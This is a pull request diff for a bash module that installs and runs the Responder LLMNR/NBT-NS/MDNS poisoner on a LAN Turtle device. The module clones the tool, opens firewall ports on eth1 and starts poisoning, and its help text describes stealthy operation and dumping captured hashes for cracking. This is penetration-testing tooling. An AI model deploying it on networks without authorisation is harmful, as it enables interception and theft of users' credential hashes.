### PR TITLE
New module responder

### DIFF
--- a/modules/responder
+++ b/modules/responder
@@ -31,13 +31,13 @@ if [ -s /etc/config/responder ];
       sshfs)
         if pgrep sshfs > /dev/null; then 
           if [ -s /etc/turtle/Responder/Responder.db ]; then
-		      rm -r /etc/turtle/Responder/Responder.db
-		    fi
-		    if [ $(readlink /etc/turtle/Responder/logs) != "/sshfs/Responder/logs" ]; then
+            rm -r /etc/turtle/Responder/Responder.db
+          fi
+          if [ $(readlink /etc/turtle/Responder/logs) != "/sshfs/Responder/logs" ]; then
             rm -r /etc/turtle/Responder/logs
             mkdir -p /sshfs/Responder/logs
-	          ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
-		    fi
+            ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
+          fi
           echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
           echo responder started and logs are being saved to /sshfs/Responder/logs
         else 
@@ -45,14 +45,14 @@ if [ -s /etc/config/responder ];
         fi
         ;;
       tmp)
-	      if [ -s /etc/turtle/Responder/Responder.db ]; then
-		      rm -r /etc/turtle/Responder/Responder.db
-		    fi
-		    if [ $(readlink /etc/turtle/Responder/logs) != "/tmp/Responder/logs" ]; then
+        if [ -s /etc/turtle/Responder/Responder.db ]; then
+          rm -r /etc/turtle/Responder/Responder.db
+        fi
+        if [ $(readlink /etc/turtle/Responder/logs) != "/tmp/Responder/logs" ]; then
           rm -r /etc/turtle/Responder/logs
           mkdir -p /tmp/Responder/logs
-	        ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
-		    fi
+          ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
+        fi
           echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
           echo responder started and logs are being saved to /tmp/Responder/logs
         ;;

--- a/modules/responder
+++ b/modules/responder
@@ -31,25 +31,21 @@ if [ -s /etc/config/responder ];
       sshfs)
         if pgrep sshfs > /dev/null; then 
           echo "SSHFS Running"
-          if [[ ! -L /etc/turtle/Responder/logs || ! -L /sshfs/Responder/logs ]]; then
-            rm -r /etc/turtle/Responder/logs
-            mkdir -p /sshfs/Responder/logs
-            ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
-            echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
-            echo responder started and logs are being saved to /sshfs/Responder/logs
-          fi 
+          rm -r /etc/turtle/Responder/logs
+          mkdir -p /sshfs/Responder/logs
+          ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
+          echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
+          echo responder started and logs are being saved to /sshfs/Responder/logs
         else 
           echo "SSHFS not running"
         fi
         ;;
       tmp)
-	if [[ ! -L /etc/turtle/Responder/logs || ! -L /tmp/Responder/logs ]]; then
-            rm -r /etc/turtle/Responder/logs
-            mkdir -p /tmp/Responder/logs
-            ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
-            echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
-            echo responder started and logs are being saved to /tmp/Responder/logs
-	fi
+        rm -r /etc/turtle/Responder/logs
+        mkdir -p /tmp/Responder/logs
+        ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
+        echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
+        echo responder started and logs are being saved to /tmp/Responder/logs
         ;;
     esac
   else

--- a/modules/responder
+++ b/modules/responder
@@ -1,0 +1,114 @@
+#!/bin/bash /usr/lib/turtle/turtle_module
+VERSION="1.0"
+DESCRIPTION="Responder - LLMNR, NBT-NS and MDNS poisoner"
+CONF=/tmp/responder.form
+AUTHOR=IMcPwn
+
+: ${DIALOG_OK=0}
+: ${DIALOG_CANCEL=1}
+: ${DIALOG_HELP=2}
+: ${DIALOG_EXTRA=3}
+: ${DIALOG_ESC=255}
+
+function start {
+  if [ ! -s /usr/bin/git ]; then
+     opkg update && opkg install git 
+  fi
+
+  if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]]; then
+      rm -r /etc/turtle/Responder
+      git clone git://github.com/SpiderLabs/Responder /etc/turtle/Responder
+  fi
+
+if [ -s /etc/config/responder ];
+  then
+    responder_log=$(uci get responder.log)
+    case $responder_log in
+      sshfs)
+        if pgrep sshfs > /dev/null; then 
+          echo "SSHFS Running"
+          if [[ ! -L /etc/turtle/Responder/logs || ! -L /sshfs/Responder/logs ]]; then
+		rm -r /etc/turtle/Responder/logs
+		mkdir -p /sshfs/Responder/logs
+		ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
+                echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
+  		echo responder started and logs are being saved to /sshfs
+          fi 
+        else 
+          echo "SSHFS not running"
+        fi
+        ;;
+      tmp)
+	if [[ ! -L /etc/turtle/Responder/logs || ! -L /tmp/Responder/logs ]]; then
+        	rm -r /etc/turtle/Responder/logs
+		mkdir -p /tmp/Responder/logs
+		ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
+                echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
+  		echo responder started and logs are being saved to /tmp
+	fi
+        ;;
+    esac
+  else
+    echo "Responder not configured."
+  fi
+}
+
+function stop {
+  kill $(ps | grep -w [/]etc/turtle/Responder/Responder.py | awk {'print $1'})
+}
+
+function status {
+  if ps | grep -w -q [/]etc/turtle/Responder/Responder.py; then echo "1"; else echo "0"; fi
+}
+
+function configure {
+  if [ -s /etc/config/responder ]
+  then
+    responder_log=$(uci get responder.log)
+  else
+    touch /etc/config/responder
+  fi
+
+  dialog --ok-label "Submit" \
+    --help-button \
+    --title "Responder Configuration" \
+    --radiolist "\n\
+Responder is an LLMNR, NBT-NS and MDNS poisoner.\n\nNOTICE: The first time you run this module it may take a long time to load. Please let it finish.\n\nThe log files can be saved to SSHFS or /tmp.\n" 16 60 3\
+    1 "Save log to SSHFS if available." off\
+    2 "Save log to /tmp/" off\
+  2>$CONF
+
+  return=$?
+
+  case $return in
+    $DIALOG_OK)
+      LOG=$(cat $CONF)
+      case $LOG in
+        1)
+          uci set responder.log="sshfs"
+          uci commit responder
+          ;;
+        2)
+          uci set responder.log="tmp"
+          uci commit responder
+          ;;
+      esac
+    ;;
+    $DIALOG_CANCEL)
+      rm $CONF
+      clear
+      exit;;
+    $DIALOG_HELP)
+      dialog --title "Help" \
+        --msgbox "\
+Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409).\n\
+By default, the tool will only answer to File Server Service request, which is for SMB.\n\n\
+The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior.\n\n\
+For more information, see: https://github.com/SpiderLabs/Responder\n\
+" 20 60
+      configure
+      ;;
+    $DIALOG_ESC)
+      clear;;
+  esac
+}

--- a/modules/responder
+++ b/modules/responder
@@ -215,7 +215,7 @@ Poisoning will be logged to Poisoners-Session.log\n\n\
 All hashes are dumped an unique file John Jumbo compliant, using this format:\n\
 (MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt\n\n\
 " 18 72
-configure
+log
   esac
 }
 
@@ -311,7 +311,7 @@ By default, the tool will only answer to File Server Service request, which is f
 The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior.\n\n\
 For more information, see: https://github.com/SpiderLabs/Responder\n\
 " 18 72
-configure
+log
   esac
 }
 
@@ -339,11 +339,11 @@ function configure {
   fi
 
   dialog --title "" --menu "" 15 60 5 \
-    "log"	"Specify log location" \
-    "interface"   "Specify interface to target" \
-    "mode"       "Specify Responder mode" \
+    "log"	      "Specify log location" \
+    "interface"       "Specify interface to target" \
+    "mode"            "Specify Responder mode" \
     "responderconf"   "Edit Responder.conf" \
-    "back"      "Return to previous menu" 2> $CONF
+    "back"            "Return to previous menu" 2> $CONF
   result=$(cat $CONF && rm $CONF &>/dev/null)
   case $result in
     "log") log;;

--- a/modules/responder
+++ b/modules/responder
@@ -111,7 +111,7 @@ function start {
           fi
           
           echo "python /etc/turtle/Responder/Responder.py $mode -I $responder_interface" | at now
-          echo "Responder started and logs are being saved to /sshfs/Responder"
+          echo -e "Responder started in mode $responder_mode against interface $responder_interface\nand logs are being saved to /sshfs/Responder"
         else 
           echo "SSHFS not running"
           exit 1
@@ -149,7 +149,7 @@ function start {
         fi
         
         echo "python /etc/turtle/Responder/Responder.py $mode -I $responder_interface" | at now
-        echo "Responder started and logs are being saved to /tmp/Responder"
+        echo -e "Responder started in mode $responder_mode against interface $responder_interface\nand logs are being saved to /tmp/Responder"
         ;;
       *)
         echo "Responder configuration not valid."

--- a/modules/responder
+++ b/modules/responder
@@ -33,7 +33,7 @@ if [ -s /etc/config/responder ];
           if [ -s /etc/turtle/Responder/Responder.db ]; then
             rm -r /etc/turtle/Responder/Responder.db
           fi
-          if [ $(readlink /etc/turtle/Responder/logs) ! == "/sshfs/Responder/logs" ]; then
+          if [ $(readlink /etc/turtle/Responder/logs) != "/sshfs/Responder/logs" ]; then
             rm -r /etc/turtle/Responder/logs
             mkdir -p /sshfs/Responder/logs
             ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
@@ -48,7 +48,7 @@ if [ -s /etc/config/responder ];
         if [ -s /etc/turtle/Responder/Responder.db ]; then
           rm -r /etc/turtle/Responder/Responder.db
         fi
-        if [ $(readlink /etc/turtle/Responder/logs) ! == "/tmp/Responder/logs" ]; then
+        if [ $(readlink /etc/turtle/Responder/logs) != "/tmp/Responder/logs" ]; then
           rm -r /etc/turtle/Responder/logs
           mkdir -p /tmp/Responder/logs
           ln -s /tmp/Responder/logs /etc/turtle/Responder/logs

--- a/modules/responder
+++ b/modules/responder
@@ -66,7 +66,7 @@ function status {
 }
 
 function configure {
-  if [ -s /etc/config/responder ]
+  if [ -s /etc/config/responder ];
   then
     responder_log=$(uci get responder.log)
   else

--- a/modules/responder
+++ b/modules/responder
@@ -37,23 +37,23 @@ function start {
   
     if [[ ! $(opkg list-installed | grep git) ]];
     then
-      check_internet
       echo "Git not installed. Installing..."
+      check_internet
       opkg update && opkg install git
     fi
     
     if [[ ! $(opkg list-installed | grep python-sqlite3) ]];
     then
-      check_internet
       echo "Python-sqlite3 not installed. Installing..."
+      check_internet
       opkg update && opkg install python-sqlite3
     fi
     
     if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py || ! -s /etc/turtle/Responder/Responder.conf ]];
     then
+      echo "Responder files are not valid. Downloading..."
       check_internet
       rm -rf /etc/turtle/Responder
-      echo "Responder files are not valid. Downloading..."
       git clone git://github.com/SpiderLabs/Responder /etc/turtle/Responder
     fi
     
@@ -197,7 +197,7 @@ function check_internet {
     ping -q -w 5 -c 1 lanturtle.com &> /dev/null && {
         :
     } || {
-	echo -e "The LAN Turtle is currently offline. Responder requires\nan internet connection to install dependencies."
+	echo -e "\nThe LAN Turtle is currently offline. The previous\noperation requires an internet connection."
         exit 1
     }
 }

--- a/modules/responder
+++ b/modules/responder
@@ -1,5 +1,5 @@
 #!/bin/bash /usr/lib/turtle/turtle_module
-VERSION="2.2"
+VERSION="2.3"
 DESCRIPTION="Responder - LLMNR, NBT-NS and MDNS poisoner"
 CONF=/tmp/responder.form
 AUTHOR=IMcPwn
@@ -11,191 +11,202 @@ AUTHOR=IMcPwn
 : ${DIALOG_ESC=255}
 
 function start {
-	if [ -s /etc/config/responder ]; 
-	then
-		responder_interface=$(uci get responder.interface)
-		responder_log=$(uci get responder.log)
-		responder_mode=$(uci get responder.mode)
-		
-		if [[ $responder_interface == "" ]];
-		then
-			echo "Responder interface not configured."
-			exit 1
-		fi
-		
-		if [[ $responder_log == "" ]];
-		then
-			echo "Responder log location not configured."
-			exit 1
-		fi
-		
-		if [[ $responder_mode == "" ]];
-		then
-			echo "Responder mode not configured."
-			exit 1
-		fi
-	
-		if [[ ! $(opkg list-installed | grep git) ]];
-		then
-			echo "Git not installed. Installing..."
-			opkg update && opkg install git
-		fi
-		
-		if [[ ! $(opkg list-installed | grep python-sqlite3) ]];
-		then
-			echo "Python-sqlite3 not installed. Installing..."
-			opkg update && opkg install python-sqlite3
-		fi
-		
-		if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py || ! -s /etc/turtle/Responder/Responder.conf ]];
-		then
-			rm -rf /etc/turtle/Responder
-			echo "Responder not downloaded or corrupted. Downloading..."
-			git clone git://github.com/SpiderLabs/Responder /etc/turtle/Responder
-		fi
-		
-		case $responder_mode in
-			1) mode="";;
-			2) mode="-A";;
-			3) mode="-w";;
-			4) mode="-r";;
-			5) mode="-F";;
-			6) mode="-f";;
-			7) mode="-v";;
-			8) mode="-r -F";;
-			9) mode="-r -F -f";;
-			*)
-				echo "Responder configuration not valid."
-				echo "Please re-configure then try again."
-				rm -f /etc/config/responder
-				exit 1
-				;;
-		esac
-	
-		case $responder_log in
-			sshfs)
-				if pgrep sshfs > /dev/null;
-				then
-					if [[ $responder_interface == "eth1" ]];
-					then
-						iptables -t filter -I INPUT 1 -i eth1 -j ACCEPT
-						iptables -I INPUT 1 -i eth1 -p udp --dport 53 -j ACCEPT
-						iptables -I INPUT 1 -i eth1 -p udp --dport 137 -j ACCEPT
-						iptables -I INPUT 1 -i eth1 -p udp --dport 138 -j ACCEPT
-						iptables -I INPUT 1 -i eth1 -p udp --dport 389 -j ACCEPT
-						iptables -I INPUT 1 -i eth1 -p udp --dport 5553 -j ACCEPT
-						iptables -I INPUT 1 -i eth1 -p tcp --dport 21 -j ACCEPT
-						iptables -I INPUT 1 -i eth1 -p tcp --dport 25 -j ACCEPT
-						iptables -I INPUT 1 -i eth1 -p tcp --dport 80 -j ACCEPT
-						iptables -I INPUT 1 -i eth1 -p tcp --dport 110 -j ACCEPT
-						iptables -I INPUT 1 -i eth1 -p tcp --dport 139 -j ACCEPT
-						iptables -I INPUT 1 -i eth1 -p tcp --dport 389 -j ACCEPT
-						iptables -I INPUT 1 -i eth1 -p tcp --dport 445 -j ACCEPT
-						iptables -I INPUT 1 -i eth1 -p tcp --dport 1433 -j ACCEPT
-						iptables -I INPUT 1 -i eth1 -p tcp --dport 3141 -j ACCEPT
-					fi
-					
-					if [ -s /etc/turtle/Responder/Responder.db ]; 
-					then
-						rm -f /etc/turtle/Responder/Responder.db
-					fi
-					
-					if [[ $(readlink /etc/turtle/Responder/logs) != "/sshfs/Responder/logs" || ! -d /sshfs/Responder/logs ]]; 
-					then
-						rm -rf /etc/turtle/Responder/logs
-						mkdir -p /sshfs/Responder/logs
-						ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
-					fi
-					
-					echo "python /etc/turtle/Responder/Responder.py $mode -I $responder_interface" | at now
-					echo "Responder started and logs are being saved to /sshfs/Responder"
-				else 
-					echo "SSHFS not running"
-				fi
-				;;
-			tmp)
-				if [[ $responder_interface == "eth1" ]]; 
-				then
-					iptables -t filter -I INPUT 1 -i eth1 -j ACCEPT
-					iptables -I INPUT 1 -i eth1 -p udp --dport 53 -j ACCEPT
-					iptables -I INPUT 1 -i eth1 -p udp --dport 137 -j ACCEPT
-					iptables -I INPUT 1 -i eth1 -p udp --dport 138 -j ACCEPT
-					iptables -I INPUT 1 -i eth1 -p udp --dport 389 -j ACCEPT
-					iptables -I INPUT 1 -i eth1 -p udp --dport 5553 -j ACCEPT
-					iptables -I INPUT 1 -i eth1 -p tcp --dport 21 -j ACCEPT
-					iptables -I INPUT 1 -i eth1 -p tcp --dport 25 -j ACCEPT
-					iptables -I INPUT 1 -i eth1 -p tcp --dport 80 -j ACCEPT
-					iptables -I INPUT 1 -i eth1 -p tcp --dport 110 -j ACCEPT
-					iptables -I INPUT 1 -i eth1 -p tcp --dport 139 -j ACCEPT
-					iptables -I INPUT 1 -i eth1 -p tcp --dport 389 -j ACCEPT
-					iptables -I INPUT 1 -i eth1 -p tcp --dport 445 -j ACCEPT
-					iptables -I INPUT 1 -i eth1 -p tcp --dport 1433 -j ACCEPT
-					iptables -I INPUT 1 -i eth1 -p tcp --dport 3141 -j ACCEPT
-				fi
-				
-				if [ -s /etc/turtle/Responder/Responder.db ]; 
-				then
-					rm -f /etc/turtle/Responder/Responder.db
-				fi
-				
-				if [[ $(readlink /etc/turtle/Responder/logs) != "/tmp/Responder/logs" || ! -d /tmp/Responder/logs ]]; then
-					rm -rf /etc/turtle/Responder/logs
-					mkdir -p /tmp/Responder/logs
-					ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
-				fi
-				
-				echo "python /etc/turtle/Responder/Responder.py $mode -I $responder_interface" | at now
-				echo "Responder started and logs are being saved to /tmp/Responder"
-				;;
-			*)
-				echo "Responder configuration not valid."
-				echo "Please re-configure then try again."
-				rm -f /etc/config/responder
-				exit 1
-				;;
-		esac
-	else
-		echo "Responder not configured."
-		exit 1
+  if [ -s /etc/config/responder ]; 
+  then
+    responder_interface=$(uci get responder.interface)
+    responder_log=$(uci get responder.log)
+    responder_mode=$(uci get responder.mode)
+    
+    if [[ $responder_interface == "" ]];
+    then
+      echo "Responder interface not configured."
+      exit 1
+    fi
+    
+    if [[ $responder_log == "" ]];
+    then
+      echo "Responder log location not configured."
+      exit 1
+    fi
+    
+    if [[ $responder_mode == "" ]];
+    then
+      echo "Responder mode not configured."
+      exit 1
+    fi
+  
+    if [[ ! $(opkg list-installed | grep git) ]];
+    then
+      check_internet
+      echo "Git not installed. Installing..."
+      opkg update && opkg install git
+    fi
+    
+    if [[ ! $(opkg list-installed | grep python-sqlite3) ]];
+    then
+      check_internet
+      echo "Python-sqlite3 not installed. Installing..."
+      opkg update && opkg install python-sqlite3
+    fi
+    
+    if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py || ! -s /etc/turtle/Responder/Responder.conf ]];
+    then
+      check_internet
+      rm -rf /etc/turtle/Responder
+      echo "Responder not downloaded or corrupted. Downloading..."
+      git clone git://github.com/SpiderLabs/Responder /etc/turtle/Responder
+    fi
+    
+    case $responder_mode in
+      1) mode="";;
+      2) mode="-A";;
+      3) mode="-w";;
+      4) mode="-r";;
+      5) mode="-F";;
+      6) mode="-f";;
+      7) mode="-v";;
+      8) mode="-r -F";;
+      9) mode="-r -F -f";;
+      *)
+        echo "Responder configuration not valid."
+        echo "Please re-configure then try again."
+        rm -f /etc/config/responder
+        exit 1
+        ;;
+    esac
+  
+    case $responder_log in
+      sshfs)
+        if pgrep sshfs > /dev/null;
+        then
+          if [[ $responder_interface == "eth1" ]];
+          then
+            iptables -t filter -I INPUT 1 -i eth1 -j ACCEPT
+            iptables -I INPUT 1 -i eth1 -p udp --dport 53 -j ACCEPT
+            iptables -I INPUT 1 -i eth1 -p udp --dport 137 -j ACCEPT
+            iptables -I INPUT 1 -i eth1 -p udp --dport 138 -j ACCEPT
+            iptables -I INPUT 1 -i eth1 -p udp --dport 389 -j ACCEPT
+            iptables -I INPUT 1 -i eth1 -p udp --dport 5553 -j ACCEPT
+            iptables -I INPUT 1 -i eth1 -p tcp --dport 21 -j ACCEPT
+            iptables -I INPUT 1 -i eth1 -p tcp --dport 25 -j ACCEPT
+            iptables -I INPUT 1 -i eth1 -p tcp --dport 80 -j ACCEPT
+            iptables -I INPUT 1 -i eth1 -p tcp --dport 110 -j ACCEPT
+            iptables -I INPUT 1 -i eth1 -p tcp --dport 139 -j ACCEPT
+            iptables -I INPUT 1 -i eth1 -p tcp --dport 389 -j ACCEPT
+            iptables -I INPUT 1 -i eth1 -p tcp --dport 445 -j ACCEPT
+            iptables -I INPUT 1 -i eth1 -p tcp --dport 1433 -j ACCEPT
+            iptables -I INPUT 1 -i eth1 -p tcp --dport 3141 -j ACCEPT
+          fi
+          
+          if [ -s /etc/turtle/Responder/Responder.db ]; 
+          then
+            rm -f /etc/turtle/Responder/Responder.db
+          fi
+          
+          if [[ $(readlink /etc/turtle/Responder/logs) != "/sshfs/Responder/logs" || ! -d /sshfs/Responder/logs ]]; 
+          then
+            rm -rf /etc/turtle/Responder/logs
+            mkdir -p /sshfs/Responder/logs
+            ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
+          fi
+          
+          echo "python /etc/turtle/Responder/Responder.py $mode -I $responder_interface" | at now
+          echo "Responder started and logs are being saved to /sshfs/Responder"
+        else 
+          echo "SSHFS not running"
+        fi
+        ;;
+      tmp)
+        if [[ $responder_interface == "eth1" ]]; 
+        then
+          iptables -t filter -I INPUT 1 -i eth1 -j ACCEPT
+          iptables -I INPUT 1 -i eth1 -p udp --dport 53 -j ACCEPT
+          iptables -I INPUT 1 -i eth1 -p udp --dport 137 -j ACCEPT
+          iptables -I INPUT 1 -i eth1 -p udp --dport 138 -j ACCEPT
+          iptables -I INPUT 1 -i eth1 -p udp --dport 389 -j ACCEPT
+          iptables -I INPUT 1 -i eth1 -p udp --dport 5553 -j ACCEPT
+          iptables -I INPUT 1 -i eth1 -p tcp --dport 21 -j ACCEPT
+          iptables -I INPUT 1 -i eth1 -p tcp --dport 25 -j ACCEPT
+          iptables -I INPUT 1 -i eth1 -p tcp --dport 80 -j ACCEPT
+          iptables -I INPUT 1 -i eth1 -p tcp --dport 110 -j ACCEPT
+          iptables -I INPUT 1 -i eth1 -p tcp --dport 139 -j ACCEPT
+          iptables -I INPUT 1 -i eth1 -p tcp --dport 389 -j ACCEPT
+          iptables -I INPUT 1 -i eth1 -p tcp --dport 445 -j ACCEPT
+          iptables -I INPUT 1 -i eth1 -p tcp --dport 1433 -j ACCEPT
+          iptables -I INPUT 1 -i eth1 -p tcp --dport 3141 -j ACCEPT
+        fi
+        
+        if [ -s /etc/turtle/Responder/Responder.db ]; 
+        then
+          rm -f /etc/turtle/Responder/Responder.db
+        fi
+        
+        if [[ $(readlink /etc/turtle/Responder/logs) != "/tmp/Responder/logs" || ! -d /tmp/Responder/logs ]]; then
+          rm -rf /etc/turtle/Responder/logs
+          mkdir -p /tmp/Responder/logs
+          ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
+        fi
+        
+        echo "python /etc/turtle/Responder/Responder.py $mode -I $responder_interface" | at now
+        echo "Responder started and logs are being saved to /tmp/Responder"
+        ;;
+      *)
+        echo "Responder configuration not valid."
+        echo "Please re-configure then try again."
+        rm -f /etc/config/responder
+        exit 1
+        ;;
+    esac
+  else
+    echo "Responder not configured."
+    exit 1
 fi
 }
 
 function stop {
-	responder_interface=$(uci get responder.interface)
-	if [[ $responder_interface == "eth1" ]]; 
-	then
-		#iptables -t filter -I INPUT 1 -i eth1 -j ACCEPT
-		iptables -t filter -D INPUT -i eth1 -j ACCEPT
-		iptables -D INPUT -i eth1 -p udp --dport 53 -j ACCEPT
-		iptables -D INPUT -i eth1 -p udp --dport 137 -j ACCEPT
-		iptables -D INPUT -i eth1 -p udp --dport 138 -j ACCEPT
-		iptables -D INPUT -i eth1 -p udp --dport 389 -j ACCEPT
-		iptables -D INPUT -i eth1 -p udp --dport 5553 -j ACCEPT
-		iptables -D INPUT -i eth1 -p tcp --dport 21 -j ACCEPT
-		iptables -D INPUT -i eth1 -p tcp --dport 25 -j ACCEPT
-		iptables -D INPUT -i eth1 -p tcp --dport 80 -j ACCEPT
-		iptables -D INPUT -i eth1 -p tcp --dport 110 -j ACCEPT
-		iptables -D INPUT -i eth1 -p tcp --dport 139 -j ACCEPT
-		iptables -D INPUT -i eth1 -p tcp --dport 389 -j ACCEPT
-		iptables -D INPUT -i eth1 -p tcp --dport 445 -j ACCEPT
-		iptables -D INPUT -i eth1 -p tcp --dport 1433 -j ACCEPT
-		iptables -D INPUT -i eth1 -p tcp --dport 3141 -j ACCEPT
-	fi
-	
-	kill $(ps | grep -w [/]etc/turtle/Responder/Responder.py | awk {'print $1'})
+  responder_interface=$(uci get responder.interface)
+  if [[ $responder_interface == "eth1" ]]; 
+  then
+    #iptables -t filter -I INPUT 1 -i eth1 -j ACCEPT
+    iptables -t filter -D INPUT -i eth1 -j ACCEPT
+    iptables -D INPUT -i eth1 -p udp --dport 53 -j ACCEPT
+    iptables -D INPUT -i eth1 -p udp --dport 137 -j ACCEPT
+    iptables -D INPUT -i eth1 -p udp --dport 138 -j ACCEPT
+    iptables -D INPUT -i eth1 -p udp --dport 389 -j ACCEPT
+    iptables -D INPUT -i eth1 -p udp --dport 5553 -j ACCEPT
+    iptables -D INPUT -i eth1 -p tcp --dport 21 -j ACCEPT
+    iptables -D INPUT -i eth1 -p tcp --dport 25 -j ACCEPT
+    iptables -D INPUT -i eth1 -p tcp --dport 80 -j ACCEPT
+    iptables -D INPUT -i eth1 -p tcp --dport 110 -j ACCEPT
+    iptables -D INPUT -i eth1 -p tcp --dport 139 -j ACCEPT
+    iptables -D INPUT -i eth1 -p tcp --dport 389 -j ACCEPT
+    iptables -D INPUT -i eth1 -p tcp --dport 445 -j ACCEPT
+    iptables -D INPUT -i eth1 -p tcp --dport 1433 -j ACCEPT
+    iptables -D INPUT -i eth1 -p tcp --dport 3141 -j ACCEPT
+  fi
+  
+  kill $(ps | grep -w [/]etc/turtle/Responder/Responder.py | awk {'print $1'})
 }
 
 function status {
-	if ps | grep -w -q [/]etc/turtle/Responder/Responder.py; then echo "1"; else echo "0"; fi
+  if ps | grep -w -q [/]etc/turtle/Responder/Responder.py; then echo "1"; else echo "0"; fi
 }
 
+function check_internet {
+    ping -q -w 5 -c 1 lanturtle.com &> /dev/null && {
+        :
+    } || {
+	echo -e "The LAN Turtle is currently offline. Responder requires\nan internet connection to install dependencies."
+        exit 1
+    }
+}
 
 function log {
 dialog --ok-label "Submit" \
     --title "Responder Log Configuration" \
-	--extra-button \
-	--extra-label "View log" \
-	--help-button \
+  --extra-button \
+  --extra-label "View log" \
+  --help-button \
     --radiolist "\n\
 The log files can be saved to SSHFS or tmp.\n" 16 60 3\
     1 "Save log to SSHFS if available." off\
@@ -206,37 +217,37 @@ The log files can be saved to SSHFS or tmp.\n" 16 60 3\
     $DIALOG_OK)
       LOG=$(cat $CONF)
       case $LOG in
-	1)
+        1)
           uci set responder.log="sshfs"
           uci commit responder
           ;;
-	2)
+        2)
           uci set responder.log="tmp"
           uci commit responder
           ;;
   esac
   configure
-    ;;
+  ;;
     $DIALOG_CANCEL)
       configure;;
     $DIALOG_ESC)
       configure;;
-	$DIALOG_EXTRA)
-		responder_log=$(uci get responder.log)
-		case $responder_log in
-			sshfs)
-				dialog --title "/sshfs/Responder/logs/Responder-Session.log" --clear --tailbox "/sshfs/Responder/logs/Responder-Session.log" 18 72
-				;;
-			tmp)
-				dialog --title "/tmp/Responder/logs/Responder-Session.log" --clear --tailbox "/tmp/Responder/logs/Responder-Session.log" 18 72
-				;;
-			*)
-				echo "Responder log location not configured."
-				;;
-		esac
-		log;;
-	$DIALOG_HELP)
-		dialog --title "Help" --msgbox "\n\
+  $DIALOG_EXTRA)
+    responder_log=$(uci get responder.log)
+    case $responder_log in
+      sshfs)
+        dialog --title "/sshfs/Responder/logs/Responder-Session.log" --clear --tailbox "/sshfs/Responder/logs/Responder-Session.log" 18 72
+        ;;
+      tmp)
+        dialog --title "/tmp/Responder/logs/Responder-Session.log" --clear --tailbox "/tmp/Responder/logs/Responder-Session.log" 18 72
+        ;;
+      *)
+        echo "Responder log location not configured."
+        ;;
+    esac
+    log;;
+  $DIALOG_HELP)
+    dialog --title "Help" --msgbox "\n\
 All activity will be logged to Responder-Session.log\n\
 Analyze mode will be logged to Analyze-Session.log\n\
 Poisoning will be logged to Poisoners-Session.log\n\n\
@@ -260,16 +271,16 @@ Responder can target the Host machine (The computer the LAN Turtle is plugged in
     $DIALOG_OK)
       INTERFACE=$(cat $CONF)
       case $INTERFACE in
-	1)
+        1)
           uci set responder.interface="br-lan"
           uci commit responder
           ;;
-	2)
+        2)
           uci set responder.interface="eth1"
           uci commit responder
           ;;
       esac
-	  configure
+    configure
     ;;
     $DIALOG_CANCEL)
       configure;;
@@ -281,7 +292,7 @@ Responder can target the Host machine (The computer the LAN Turtle is plugged in
 function mode {
   dialog --ok-label "Submit" \
     --title "Responder Mode" \
-	--help-button \
+    --help-button \
     --radiolist "Choose mode\n \n" 20 60 10\
     1 "Default mode" on\
     2 "Analyze mode" off\
@@ -298,42 +309,42 @@ function mode {
     $DIALOG_OK)
       mode=$(cat $CONF)
       case $mode in
-	1)
+        1)
           uci set responder.mode="1"
           uci commit responder;;
-	2)
+        2)
           uci set responder.mode="2"
           uci commit responder;;
-	3)
+        3)
           uci set responder.mode="3"
           uci commit responder;;
-	4)
+        4)
           uci set responder.mode="4"
           uci commit responder;;
-	5)
+        5)
           uci set responder.mode="5"
           uci commit responder;;
-	6)
+        6)
           uci set responder.mode="6"
           uci commit responder;;
-	7)
+        7)
           uci set responder.mode="7"
           uci commit responder;;
-	8)
+        8)
           uci set responder.mode="8"
           uci commit responder;;
-	9)
+        9)
           uci set responder.mode="9"
           uci commit responder;;
       esac
       configure
-    ;;
+      ;;
     $DIALOG_CANCEL)
       configure;;
     $DIALOG_ESC)
       configure;;
-	$DIALOG_HELP)
-		dialog --title "Help" --msgbox "\n\
+  $DIALOG_HELP)
+    dialog --title "Help" --msgbox "\n\
 Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409).\n\
 By default, the tool will only answer to File Server Service request, which is for SMB.\n\n\
 The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior.\n\n\
@@ -376,11 +387,11 @@ dialog \
 function configure {
 if [[ ! -s /etc/config/responder ]];
 then
-	touch /etc/config/responder
+  touch /etc/config/responder
 fi
 
   dialog --title "" --menu "" 15 60 5 \
-    "log"	      "Specify log location" \
+    "log"             "Specify log location" \
     "interface"       "Specify interface to target" \
     "mode"            "Specify Responder mode" \
